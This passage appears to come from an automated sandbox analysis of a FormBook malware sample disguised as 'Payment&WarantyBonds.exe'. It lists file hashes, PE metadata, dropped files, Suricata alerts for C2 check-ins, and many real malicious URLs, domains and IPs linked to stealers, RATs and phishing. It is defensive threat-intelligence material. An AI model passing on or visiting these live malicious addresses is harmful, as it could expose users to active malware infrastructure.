                                                                                                                                                                              General terms and conditions of sale - Valid from 10202024 to 12312024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.sleepstudy.clinic/qb3j/?ldz=rxiD0VSh&jB=cFuFzZ3YvTtiHrP9YgB50pNFy1R7naj/7FPBP4W+y4TnGL17Vly9WSpF5ldignjoFUjCQ6N7kk5Em/mIXQaOgZKVJHh7DFNdo3QSNa+0F8GHeDzAsg==
                                                                                                                                                                              20.2.249.7REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              PO 18-3081.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/sb22/
                                                                                                                                                                              rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/vawg/
                                                                                                                                                                              INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              PI#220824.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.8auvih.top/iwsn/
                                                                                                                                                                              PURCHASE ORDER_330011 SEPTEMBER 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              PI #9100679047.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.8auvih.top/iwsn/?gLc=954R46Wvx7n5T5KmTAnXXU7c5sLMP21esxIuNAnYAqeAvOaVtLyGHXgDG+9pDjEdQAJe3x02PhQzxke8Oe2Iq6h+ey0690ZMgK9npYwF/LLyY1w9way6Y1E=&6fQ=evG0
                                                                                                                                                                              Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.8auvih.top/iwsn/

                                                                                                                                                                              Domains

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              www.cesach.netSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 217.76.156.252

                                                                                                                                                                              ASNs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                              fileDoc_Commission Dept Ec.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              HLZwUhcJ28.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.32.196
                                                                                                                                                                              https://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                                                                                                                                              • 104.26.0.231
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              http://hprus.conegutsud.com.pe/4zgrHK17910PyfC1508dysnmxbczx27005OLWUIBMTRFCEVBH25578NWDJ17331m12#2mzdvgfkgua042eh8kky7aanhr5dggelvb8fjk5yz6jna8o8e5Get hashmaliciousPhisherBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.26.0.100
                                                                                                                                                                              HETZNER-ASDEhttps://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 148.251.20.70
                                                                                                                                                                              wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 144.79.90.34
                                                                                                                                                                              http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 188.40.167.81
                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 46.4.195.6
                                                                                                                                                                              jew.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 78.46.244.4
                                                                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 95.216.25.89
                                                                                                                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 193.25.170.240
                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 88.198.164.142
                                                                                                                                                                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 116.203.104.203
                                                                                                                                                                              AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 18.244.18.32
                                                                                                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              Arquivo_4593167.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                              • 13.35.58.7
                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 18.244.18.38
                                                                                                                                                                              Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 76.76.21.98
                                                                                                                                                                              zte.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                              https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 18.239.36.13
                                                                                                                                                                              https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                              • 18.245.31.89
                                                                                                                                                                              https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 99.86.8.175
                                                                                                                                                                              (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                              • 108.138.217.58
                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 20.96.153.111
                                                                                                                                                                              Arquivo_4593167.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                              • 40.119.152.241
                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              • 20.189.173.26
                                                                                                                                                                              Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 40.126.32.138
                                                                                                                                                                              https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Access Audits -System #6878.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 104.47.64.28
                                                                                                                                                                              https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 150.171.27.10
                                                                                                                                                                              (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                              • 104.47.64.28
                                                                                                                                                                              https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.42.14
                                                                                                                                                                              Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 150.171.27.10

                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                              No context

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              No context

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\4648H9mUM

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.950809546708747
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              File name:Payment&WarantyBonds.exe
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5:a9da1b42f6ad80ee6085f69e6c25f49b
                                                                                                                                                                              SHA1:e7f51c3eb496a278999fd893e1fcfca8a685f854
                                                                                                                                                                              SHA256:4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
                                                                                                                                                                              SHA512:da5a50aee37e977f3af7bd7af90d91245d42197978d9a8b016558989d6999a1448d44095b61b164fa7a2f7374b338e29cf0efe3be40a125f782930898dca8162
                                                                                                                                                                              SSDEEP:12288:H8aDPw1Qk89Tmyij4kIqGNlSq8UMb7SmUdiJEYqXmSEwILV4C4BWpDatCEftp2uF:HdLw9gTFsOqGHFqvUwJEYJSEp4C44pDa
                                                                                                                                                                              TLSH:5DF4238273EE4711D47E6BF52EA2164453B66749092BF66C4FAC00CC6FA6B004D5AF1B
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0.................. ........@.. ....................................@................................

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:4bd4d4d4d4d6d629

                                                                                                                                                                              Static PE Info

                                                                                                                                                                              General

                                                                                                                                                                              Entrypoint:0x4bafda
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x6721A484 [Wed Oct 30 03:14:12 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                              Data Directories

                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbaf880x4f.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x1720.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                              Sections

                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x20000xb8fe00xb90002681d2cd27ec28f4bdba76764ce7023eFalse0.9540500950168919data7.95788200827039IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rsrc0xbc0000x17200x18007fcbb9d7315293f588ab54c4c8fbedf4False0.7862955729166666data6.9286601127334855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0xbe0000xc0x2002e0b8e9b6825d01448eab31c2eb3e274False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                              Resources

                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_ICON0xbc0c80x12cfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9123572170301142
                                                                                                                                                                              RT_GROUP_ICON0xbd3a80x14data1.05
                                                                                                                                                                              RT_VERSION0xbd3cc0x350data0.4009433962264151

                                                                                                                                                                              Imports

                                                                                                                                                                              DLLImport
                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                              Network Behavior

                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-10-31T01:37:50.382091+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497413.33.130.19080TCP
                                                                                                                                                                              2024-10-31T01:37:50.382091+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497413.33.130.19080TCP
                                                                                                                                                                              2024-10-31T01:38:07.598005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449778103.120.80.11180TCP
                                                                                                                                                                              2024-10-31T01:38:10.137350+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449793103.120.80.11180TCP
                                                                                                                                                                              2024-10-31T01:38:12.532648+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449809103.120.80.11180TCP
                                                                                                                                                                              2024-10-31T01:38:15.034711+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449825103.120.80.11180TCP
                                                                                                                                                                              2024-10-31T01:38:15.034711+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449825103.120.80.11180TCP
                                                                                                                                                                              2024-10-31T01:38:21.176902+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449861217.160.0.6080TCP
                                                                                                                                                                              2024-10-31T01:38:23.716558+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449876217.160.0.6080TCP
                                                                                                                                                                              2024-10-31T01:38:26.423593+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449889217.160.0.6080TCP
                                                                                                                                                                              2024-10-31T01:38:29.080670+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449905217.160.0.6080TCP
                                                                                                                                                                              2024-10-31T01:38:29.080670+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449905217.160.0.6080TCP
                                                                                                                                                                              2024-10-31T01:38:35.120489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449941161.97.142.14480TCP
                                                                                                                                                                              2024-10-31T01:38:37.663882+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449957161.97.142.14480TCP
                                                                                                                                                                              2024-10-31T01:38:40.214668+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449973161.97.142.14480TCP
                                                                                                                                                                              2024-10-31T01:38:42.753096+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449989161.97.142.14480TCP
                                                                                                                                                                              2024-10-31T01:38:42.753096+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449989161.97.142.14480TCP
                                                                                                                                                                              2024-10-31T01:38:49.039066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001913.248.169.4880TCP
                                                                                                                                                                              2024-10-31T01:38:51.239627+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002113.248.169.4880TCP
                                                                                                                                                                              2024-10-31T01:38:53.724340+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002213.248.169.4880TCP
                                                                                                                                                                              2024-10-31T01:38:56.317263+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002313.248.169.4880TCP
                                                                                                                                                                              2024-10-31T01:38:56.317263+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002313.248.169.4880TCP
                                                                                                                                                                              2024-10-31T01:39:02.342212+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024198.251.84.20080TCP
                                                                                                                                                                              2024-10-31T01:39:04.999354+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025198.251.84.20080TCP
                                                                                                                                                                              2024-10-31T01:39:07.607846+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026198.251.84.20080TCP
                                                                                                                                                                              2024-10-31T01:39:10.123446+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450027198.251.84.20080TCP
                                                                                                                                                                              2024-10-31T01:39:10.123446+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450027198.251.84.20080TCP
                                                                                                                                                                              2024-10-31T01:39:15.979873+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028172.67.154.6780TCP
                                                                                                                                                                              2024-10-31T01:39:18.539676+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029172.67.154.6780TCP
                                                                                                                                                                              2024-10-31T01:39:21.058398+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030172.67.154.6780TCP
                                                                                                                                                                              2024-10-31T01:39:23.645578+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450031172.67.154.6780TCP
                                                                                                                                                                              2024-10-31T01:39:23.645578+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450031172.67.154.6780TCP
                                                                                                                                                                              2024-10-31T01:39:31.671887+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003220.2.249.780TCP
                                                                                                                                                                              2024-10-31T01:39:34.217233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003320.2.249.780TCP
                                                                                                                                                                              2024-10-31T01:39:36.767358+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003420.2.249.780TCP
                                                                                                                                                                              2024-10-31T01:39:39.279821+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003520.2.249.780TCP
                                                                                                                                                                              2024-10-31T01:39:39.279821+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003520.2.249.780TCP
                                                                                                                                                                              2024-10-31T01:39:45.651484+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036203.161.49.19380TCP
                                                                                                                                                                              2024-10-31T01:39:48.238767+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037203.161.49.19380TCP
                                                                                                                                                                              2024-10-31T01:39:50.762782+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038203.161.49.19380TCP
                                                                                                                                                                              2024-10-31T01:39:53.314383+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450039203.161.49.19380TCP
                                                                                                                                                                              2024-10-31T01:39:53.314383+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450039203.161.49.19380TCP
